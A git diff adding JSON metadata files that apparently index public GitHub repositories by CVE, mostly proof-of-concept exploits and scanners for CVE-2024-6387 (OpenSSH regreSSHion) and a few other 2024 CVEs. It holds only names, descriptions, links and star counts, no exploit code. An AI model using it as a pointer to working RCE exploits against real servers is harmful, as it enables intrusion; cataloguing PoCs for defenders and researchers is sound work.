"2024-08-17T21:56:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "scaner" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6050.json b/2024/CVE-2024-6050.json new file mode 100644 index 0000000000..704c282663 --- /dev/null +++ b/2024/CVE-2024-6050.json @@ -0,0 +1,33 @@ +[ + { + "id": 822644855, + "name": "CVE-2024-6050", + "full_name": "kac89\/CVE-2024-6050", + "owner": { + "login": "kac89", + "id": 5662731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5662731?v=4", + "html_url": "https:\/\/github.com\/kac89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kac89\/CVE-2024-6050", + "description": "Reflected XSS in SOWA OPAC", + "fork": false, + "created_at": "2024-07-01T14:31:37Z", + "updated_at": "2024-07-01T22:01:03Z", + "pushed_at": "2024-07-01T14:33:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6095.json b/2024/CVE-2024-6095.json new file mode 100644 index 0000000000..4bfb1503ea --- /dev/null +++ b/2024/CVE-2024-6095.json @@ -0,0 +1,33 @@ +[ + { + "id": 850674192, + "name": "-CVE-2024-6095", + "full_name": "Abdurahmon3236\/-CVE-2024-6095", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/-CVE-2024-6095", + "description": null, + "fork": false, + "created_at": "2024-09-01T13:12:20Z", + "updated_at": "2024-09-01T13:13:09Z", + "pushed_at": "2024-09-01T13:13:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6205.json b/2024/CVE-2024-6205.json new file mode 100644 index 0000000000..3d44dad7ac --- /dev/null +++ b/2024/CVE-2024-6205.json @@ -0,0 +1,33 @@ +[ + { + "id": 831611165, + "name": "CVE-2024-6205", + "full_name": "j3r1ch0123\/CVE-2024-6205", + "owner": { + "login": "j3r1ch0123", + "id": 110147529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110147529?v=4", + "html_url": "https:\/\/github.com\/j3r1ch0123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3r1ch0123\/CVE-2024-6205", + "description": "This is a python written PoC of a recent vulnerability in a wordpress plugin. More information on that here", + "fork": false, + "created_at": "2024-07-21T04:59:31Z", + "updated_at": "2024-08-18T18:15:10Z", + "pushed_at": "2024-08-18T18:15:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6222.json b/2024/CVE-2024-6222.json new file mode 100644 index 0000000000..baada9b454 --- /dev/null +++ b/2024/CVE-2024-6222.json @@ -0,0 +1,33 @@ +[ + { + "id": 838983610, + "name": "CVE-2024-6222", + "full_name": "Florian-Hoth\/CVE-2024-6222", + "owner": { + "login": "Florian-Hoth", + "id": 177672507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177672507?v=4", + "html_url": "https:\/\/github.com\/Florian-Hoth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Florian-Hoth\/CVE-2024-6222", + "description": "Docker Extension\/Dashboard RCE Vulnerability", + "fork": false, + "created_at": "2024-08-06T18:20:46Z", + "updated_at": "2024-08-15T17:08:30Z", + "pushed_at": "2024-08-06T18:21:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6366.json b/2024/CVE-2024-6366.json new file mode 100644 index 0000000000..b454dbe150 --- /dev/null +++ b/2024/CVE-2024-6366.json @@ -0,0 +1,33 @@ +[ + { + "id": 837558368, + "name": "CVE-2024-6366", + "full_name": "Abdurahmon3236\/CVE-2024-6366", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-6366", + "description": null, + "fork": false, + "created_at": "2024-08-03T10:30:49Z", + "updated_at": "2024-08-03T19:35:41Z", + "pushed_at": "2024-08-03T19:35:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6386.json b/2024/CVE-2024-6386.json new file mode 100644 index 0000000000..a2d00e0d1a --- /dev/null +++ b/2024/CVE-2024-6386.json @@ -0,0 +1,33 @@ +[ + { + "id": 852855160, + "name": "CVE-2024-6386", + "full_name": "argendo\/CVE-2024-6386", + "owner": { + "login": "argendo", + "id": 42393831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42393831?v=4", + "html_url": "https:\/\/github.com\/argendo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/argendo\/CVE-2024-6386", + "description": "Research and PoC for CVE-2024-6386", + "fork": false, + "created_at": "2024-09-05T14:44:36Z", + "updated_at": "2024-11-03T07:36:10Z", + "pushed_at": "2024-09-08T19:09:36Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6387.json b/2024/CVE-2024-6387.json new file mode 100644 index 0000000000..77d3a56e68 --- /dev/null +++ b/2024/CVE-2024-6387.json @@ -0,0 +1,2919 @@ +[ + { + "id": 822546559, + "name": "cve-2024-6387-poc", + "full_name": "zgzhang\/cve-2024-6387-poc", + "owner": { + "login": "zgzhang", + "id": 11416832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11416832?v=4", + "html_url": "https:\/\/github.com\/zgzhang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zgzhang\/cve-2024-6387-poc", + "description": "a signal handler race condition in OpenSSH's server (sshd)", + "fork": false, + "created_at": "2024-07-01T10:55:29Z", + "updated_at": "2024-11-28T00:20:21Z", + "pushed_at": "2024-07-01T10:54:02Z", + "stargazers_count": 465, + "watchers_count": 465, + "has_discussions": false, + "forks_count": 182, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 182, + "watchers": 465, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 822579775, + "name": "cve-2024-6387-poc", + "full_name": "acrono\/cve-2024-6387-poc", + "owner": { + "login": "acrono", + "id": 51956758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51956758?v=4", + "html_url": "https:\/\/github.com\/acrono", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acrono\/cve-2024-6387-poc", + "description": "32-bit PoC for CVE-2024-6387 — mirror of the original 7etsuo\/cve-2024-6387-poc", + "fork": false, + "created_at": "2024-07-01T12:16:21Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-07-01T12:25:01Z", + "stargazers_count": 381, + "watchers_count": 381, + "has_discussions": false, + "forks_count": 90, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 90, + "watchers": 381, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 822584501, + "name": "cve-2024-6387-poc", + "full_name": "lflare\/cve-2024-6387-poc", + "owner": { + "login": "lflare", + "id": 22326991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22326991?v=4", + "html_url": "https:\/\/github.com\/lflare", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lflare\/cve-2024-6387-poc", + "description": "MIRROR of the original 32-bit PoC for CVE-2024-6387 \"regreSSHion\" by 7etsuo\/cve-2024-6387-poc", + "fork": false, + "created_at": "2024-07-01T12:26:40Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-07-25T04:23:11Z", + "stargazers_count": 108, + "watchers_count": 108, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "openssh", + "poc", + "rce", + "regresshion", + "ssh" + ], + "visibility": "public", + "forks": 42, + "watchers": 108, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 822593995, + "name": "cve-2024-6387-poc", + "full_name": "shyrwall\/cve-2024-6387-poc", + "owner": { + "login": "shyrwall", + "id": 1523968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1523968?v=4", + "html_url": "https:\/\/github.com\/shyrwall", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shyrwall\/cve-2024-6387-poc", + "description": null, + "fork": false, + "created_at": "2024-07-01T12:48:36Z", + "updated_at": "2024-07-01T12:50:32Z", + "pushed_at": "2024-07-01T12:50:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822595195, + "name": "CVE-2024-6387-PoC", + "full_name": "getdrive\/CVE-2024-6387-PoC", + "owner": { + "login": "getdrive", + "id": 20697688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20697688?v=4", + "html_url": "https:\/\/github.com\/getdrive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/getdrive\/CVE-2024-6387-PoC", + "description": "PoC RCE in OpenSSH", + "fork": false, + "created_at": "2024-07-01T12:51:18Z", + "updated_at": "2024-10-31T23:48:11Z", + "pushed_at": "2024-07-01T13:34:47Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822620870, + "name": "CVE-2024-6387-POC", + "full_name": "FerasAlrimali\/CVE-2024-6387-POC", + "owner": { + "login": "FerasAlrimali", + "id": 51955818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51955818?v=4", + "html_url": "https:\/\/github.com\/FerasAlrimali", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FerasAlrimali\/CVE-2024-6387-POC", + "description": "SSHd cve-2024-6387-poc", + "fork": false, + "created_at": "2024-07-01T13:38:47Z", + "updated_at": "2024-07-01T13:42:18Z", + "pushed_at": "2024-07-01T13:42:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822634085, + "name": "cve-2024-6387-poc", + "full_name": "passwa11\/cve-2024-6387-poc", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/cve-2024-6387-poc", + "description": null, + "fork": false, + "created_at": "2024-07-01T14:08:23Z", + "updated_at": "2024-07-27T19:01:18Z", + "pushed_at": "2024-07-01T14:10:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822746375, + "name": "CVE-2024-6387", + "full_name": "jack0we\/CVE-2024-6387", + "owner": { + "login": "jack0we", + "id": 150005594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150005594?v=4", + "html_url": "https:\/\/github.com\/jack0we", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jack0we\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-01T18:28:25Z", + "updated_at": "2024-07-01T18:32:44Z", + "pushed_at": "2024-07-01T18:32:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822788426, + "name": "CVE-2024-6387_Check", + "full_name": "xaitax\/CVE-2024-6387_Check", + "owner": { + "login": "xaitax", + "id": 5014849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5014849?v=4", + "html_url": "https:\/\/github.com\/xaitax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xaitax\/CVE-2024-6387_Check", + "description": "CVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH", + "fork": false, + "created_at": "2024-07-01T20:33:20Z", + "updated_at": "2024-11-28T12:47:12Z", + "pushed_at": "2024-09-24T19:18:56Z", + "stargazers_count": 459, + "watchers_count": 459, + "has_discussions": false, + "forks_count": 88, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "exploit", + "pentesting", + "python3", + "redteam" + ], + "visibility": "public", + "forks": 88, + "watchers": 459, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 822792125, + "name": "CVE-2024-6387", + "full_name": "bigb0x\/CVE-2024-6387", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-6387", + "description": "Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2006-5051 , CVE-2008-4109 and others.", + "fork": false, + "created_at": "2024-07-01T20:45:53Z", + "updated_at": "2024-11-06T06:56:52Z", + "pushed_at": "2024-07-06T10:47:30Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "openssh", + "security-audit", + "security-tools", + "ssh", + "ssh-server" + ], + "visibility": "public", + "forks": 6, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822824673, + "name": "regresshion-check", + "full_name": "wiggels\/regresshion-check", + "owner": { + "login": "wiggels", + "id": 16748278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16748278?v=4", + "html_url": "https:\/\/github.com\/wiggels", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wiggels\/regresshion-check", + "description": "CLI Tool to Check SSH Servers for Vulnerability to CVE-2024-6387", + "fork": false, + "created_at": "2024-07-01T22:53:32Z", + "updated_at": "2024-08-01T17:34:14Z", + "pushed_at": "2024-07-16T20:25:52Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822856797, + "name": "CVE-2024-6387", + "full_name": "3yujw7njai\/CVE-2024-6387", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2024-6387", + "description": "SSH RCE PoC CVE-2024-6387", + "fork": false, + "created_at": "2024-07-02T01:08:05Z", + "updated_at": "2024-09-03T10:27:28Z", + "pushed_at": "2024-07-02T01:13:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 822860717, + "name": "OpenSSH-Vulnerability-test", + "full_name": "betancour\/OpenSSH-Vulnerability-test", + "owner": { + "login": "betancour", + "id": 283403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/283403?v=4", + "html_url": "https:\/\/github.com\/betancour", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/betancour\/OpenSSH-Vulnerability-test", + "description": "OpenSSH CVE-2024-6387 Vulnerability Checker", + "fork": false, + "created_at": "2024-07-02T01:24:04Z", + "updated_at": "2024-07-02T10:07:48Z", + "pushed_at": "2024-07-02T01:31:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822879505, + "name": "CVE-2024-6387fixshell", + "full_name": "muyuanlove\/CVE-2024-6387fixshell", + "owner": { + "login": "muyuanlove", + "id": 41590587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41590587?v=4", + "html_url": "https:\/\/github.com\/muyuanlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muyuanlove\/CVE-2024-6387fixshell", + "description": null, + "fork": false, + "created_at": "2024-07-02T02:35:24Z", + "updated_at": "2024-07-02T06:18:19Z", + "pushed_at": "2024-07-02T02:39:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822883843, + "name": "CVE-2024-6387", + "full_name": "TAM-K592\/CVE-2024-6387", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-6387", + "description": "Recently, the OpenSSH maintainers released security updates to fix a critical vulnerability that could lead to unauthenticated remote code execution (RCE) with root privileges. This vulnerability, identified as CVE-2024-6387, resides in the OpenSSH server component (sshd), which is designed to listen for connections from client applications.", + "fork": false, + "created_at": "2024-07-02T02:51:37Z", + "updated_at": "2024-11-03T07:18:48Z", + "pushed_at": "2024-07-02T03:23:00Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 822884531, + "name": "regreSSHion", + "full_name": "teamos-hub\/regreSSHion", + "owner": { + "login": "teamos-hub", + "id": 172880130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172880130?v=4", + "html_url": "https:\/\/github.com\/teamos-hub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teamos-hub\/regreSSHion", + "description": "This is a POC I wrote for CVE-2024-6387", + "fork": false, + "created_at": "2024-07-02T02:54:05Z", + "updated_at": "2024-07-02T13:12:58Z", + "pushed_at": "2024-07-02T02:48:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 822893260, + "name": "CVE-2024-6387_Check.py", + "full_name": "Maikefee\/CVE-2024-6387_Check.py", + "owner": { + "login": "Maikefee", + "id": 53931112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53931112?v=4", + "html_url": "https:\/\/github.com\/Maikefee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maikefee\/CVE-2024-6387_Check.py", + "description": null, + "fork": false, + "created_at": "2024-07-02T03:27:03Z", + "updated_at": "2024-07-02T09:17:56Z", + "pushed_at": "2024-07-02T09:17:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822897220, + "name": "CVE-2024-6387", + "full_name": "ahlfors\/CVE-2024-6387", + "owner": { + "login": "ahlfors", + "id": 1074291, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1074291?v=4", + "html_url": "https:\/\/github.com\/ahlfors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahlfors\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-02T03:42:35Z", + "updated_at": "2024-07-10T08:04:08Z", + "pushed_at": "2024-07-02T09:57:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822898666, + "name": "CVE-2024-6387-checkher", + "full_name": "Mufti22\/CVE-2024-6387-checkher", + "owner": { + "login": "Mufti22", + "id": 75854478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75854478?v=4", + "html_url": "https:\/\/github.com\/Mufti22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mufti22\/CVE-2024-6387-checkher", + "description": null, + "fork": false, + "created_at": "2024-07-02T03:48:37Z", + "updated_at": "2024-07-02T03:49:10Z", + "pushed_at": "2024-07-02T03:49:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822903933, + "name": "CVE-2024-6387-exploit", + "full_name": "thegenetic\/CVE-2024-6387-exploit", + "owner": { + "login": "thegenetic", + "id": 57350740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57350740?v=4", + "html_url": "https:\/\/github.com\/thegenetic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thegenetic\/CVE-2024-6387-exploit", + "description": "CVE-2024-6387 exploit", + "fork": false, + "created_at": "2024-07-02T04:09:44Z", + "updated_at": "2024-09-24T00:12:11Z", + "pushed_at": "2024-07-02T04:45:15Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822953002, + "name": "CVE-2024-6387", + "full_name": "R4Tw1z\/CVE-2024-6387", + "owner": { + "login": "R4Tw1z", + "id": 150011273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150011273?v=4", + "html_url": "https:\/\/github.com\/R4Tw1z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R4Tw1z\/CVE-2024-6387", + "description": "This script, created by R4Tw1z, is designed to scan IP addresses to check if they are running a potentially vulnerable version of OpenSSH. The tool leverages multi-threading to optimize scanning performance and handle multiple IP addresses concurrently.", + "fork": false, + "created_at": "2024-07-02T06:40:09Z", + "updated_at": "2024-07-05T10:15:26Z", + "pushed_at": "2024-07-02T09:01:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822958334, + "name": "CVE-2024-6387", + "full_name": "d0rb\/CVE-2024-6387", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-6387", + "description": "This Python script exploits a remote code execution vulnerability (CVE-2024-6387) in OpenSSH.", + "fork": false, + "created_at": "2024-07-02T06:53:35Z", + "updated_at": "2024-11-23T21:35:05Z", + "pushed_at": "2024-07-04T20:04:30Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822978721, + "name": "regression-scanner", + "full_name": "CiderAndWhisky\/regression-scanner", + "owner": { + "login": "CiderAndWhisky", + "id": 30117084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30117084?v=4", + "html_url": "https:\/\/github.com\/CiderAndWhisky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CiderAndWhisky\/regression-scanner", + "description": "Used to detect ssh servers vulnerable to CVE-2024-6387. Shameless robbery from https:\/\/github.com\/bigb0x\/CVE-2024-6387 using ChatGPT to translate the code to PHP.", + "fork": false, + "created_at": "2024-07-02T07:42:46Z", + "updated_at": "2024-07-02T09:06:07Z", + "pushed_at": "2024-07-02T09:06:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822991113, + "name": "CVE-2024-6387_PoC", + "full_name": "shamo0\/CVE-2024-6387_PoC", + "owner": { + "login": "shamo0", + "id": 48299520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4", + "html_url": "https:\/\/github.com\/shamo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shamo0\/CVE-2024-6387_PoC", + "description": "Script for checking CVE-2024-6387 (regreSSHion)", + "fork": false, + "created_at": "2024-07-02T08:13:23Z", + "updated_at": "2024-07-02T10:00:56Z", + "pushed_at": "2024-07-02T08:40:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2024-6387", + "exploit", + "openssh", + "poc", + "rce", + "regresshion", + "ssh", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822993766, + "name": "CVE-2024-6387-nmap", + "full_name": "paradessia\/CVE-2024-6387-nmap", + "owner": { + "login": "paradessia", + "id": 38862216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38862216?v=4", + "html_url": "https:\/\/github.com\/paradessia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paradessia\/CVE-2024-6387-nmap", + "description": "CVE-2024-6387-nmap", + "fork": false, + "created_at": "2024-07-02T08:19:55Z", + "updated_at": "2024-07-31T06:59:27Z", + "pushed_at": "2024-07-02T08:26:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823030467, + "name": "CVE-2024-6387", + "full_name": "SecWithMoh\/CVE-2024-6387", + "owner": { + "login": "SecWithMoh", + "id": 92855054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92855054?v=4", + "html_url": "https:\/\/github.com\/SecWithMoh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecWithMoh\/CVE-2024-6387", + "description": "This Go program scans targets for CVE-2024-6387 in OpenSSH, categorizing servers by vulnerability status and port availability.", + "fork": false, + "created_at": "2024-07-02T09:41:40Z", + "updated_at": "2024-07-16T07:51:21Z", + "pushed_at": "2024-07-02T10:05:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + 